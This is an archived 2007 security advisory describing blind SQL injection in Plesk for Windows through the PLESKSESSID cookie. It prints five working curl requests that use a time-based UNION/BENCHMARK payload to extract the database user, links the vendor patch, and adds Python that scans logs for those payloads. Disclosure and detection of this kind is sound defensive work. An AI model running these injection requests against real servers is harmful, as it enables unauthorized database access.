
RE: ScanAlert Security Advisory

From: Nick Merritt <nick.merritt(at)hackersafe.com>
Date: Tue Sep 11 2007 - 19:45:07 EDT


HackerSafe Labs - Security Advisory
http://www.hackersafelabs.com  

SWsoft Plesk for Windows - SQL Injection Vulnerability

Date: 9-11-07
Vendor: www.swsoft.com
Package: Plesk for Windows
Versions: v7.6.1, v8.1.0, v8.1.1, v8.2.0
Vendor Demo: https://plesk8.1win.demo.swsoft.com:8443/login.php3
Credit: Nick I Merritt

Risk:
Related Exploit Range: Remote
Attack Complexity: Medium
Level of Authentication Needed: Not Required
Confidentiality Impact: Major
Integrity Impact: Major
Availability Impact: Major

Overview:
SWsoft Plesk is a comprehensive control panel solution used by leading hosting providers worldwide for shared, virtual and dedicated hosting.

Vulnerability:
A SQL injection vulnerability exists in the Plesk application. Please see the following:

SQL Injection Page 1: "login.php3"
SQL Injection Page 2: "auth.php3"
SQL Injection Cookie Parameter: "PLESKSESSID"

Example: (Will extract the database user)

  1. Delay=5224.3877 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
    "PLESKSESSID=1' union select if
    (substring(user,1,1)=char(97),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*"
  2. Delay=5165.3031 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
    "PLESKSESSID=1' union select if
    (substring(user,2,1)=char(100),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*"
  3. Delay=5158.9512 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
    "PLESKSESSID=1' union select if
    (substring(user,3,1)=char(109),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*"
  4. Delay=5224.0980 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
    "PLESKSESSID=1' union select if
    (substring(user,4,1)=char(105),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*"
  5. Delay=5241.5251 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
    "PLESKSESSID=1' union select if
    (substring(user,5,1)=char(110),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*"

Solution: Apply the following patches - http://kb.swsoft.com/en/2159

Received on Wed Sep 12 11:15:28 2007
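
For defenders reviewing panel logs, the following added example (not part of the original advisory or of Plesk) flags requests whose PLESKSESSID cookie carries the constructs shown in the requests above. The tab-separated log layout, the alphanumeric session-token format, and the names `classify` and `scan` are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: a legitimate session id is a plain alphanumeric token.
VALID_SESSID = re.compile(r"[A-Za-z0-9]{16,64}")

# Constructs visible in the advisory's requests, checked in this order.
SQLI_MARKERS = {
    "quote": re.compile(r"['\"]"),
    "union_select": re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S),
    "benchmark": re.compile(r"\bbenchmark\s*\(", re.I),
    "comment": re.compile(r"/\*|--"),
}

def classify(cookie_header):
    """Return (verdict, reasons) for the PLESKSESSID value in a Cookie header."""
    value = None
    for part in cookie_header.split(";"):
        name, _, raw = part.strip().partition("=")
        if name == "PLESKSESSID":
            value = unquote(raw)  # decode first so %27 is seen as a quote
    if value is None:
        return ("absent", [])
    hits = [name for name, rx in SQLI_MARKERS.items() if rx.search(value)]
    if hits:
        return ("sqli", hits)
    if not VALID_SESSID.fullmatch(value):
        return ("malformed", [])
    return ("ok", [])

def scan(lines):
    """Yield findings for log lines of the assumed form ip<TAB>path<TAB>cookie."""
    findings = []
    for line in lines:
        ip, path, cookie = line.split("\t", 2)
        verdict, reasons = classify(cookie)
        if verdict in ("sqli", "malformed"):
            findings.append((ip, path, verdict, reasons))
    return findings

# Constructed sample log lines (documentation IP ranges, made-up token).
SAMPLE_LOG = [
    "203.0.113.5\t/login.php3\tPLESKSESSID=3f9c2a7b5d8e4f1a9b0c6d2e7f413a58; locale=en-US",
    "198.51.100.7\t/login.php3\tPLESKSESSID=1' union select if (substring(user,1,1)=char(97),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*",
    "198.51.100.7\t/auth.php3\tPLESKSESSID=1%27%20UNION%20SELECT%201,2,3/*",
    "192.0.2.44\t/login.php3\tPLESKSESSID=short",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same allow-list check (`VALID_SESSID`) can be applied in front of the panel to reject malformed cookies before they reach the application, in addition to applying the vendor patches.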

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:15:16 EDT

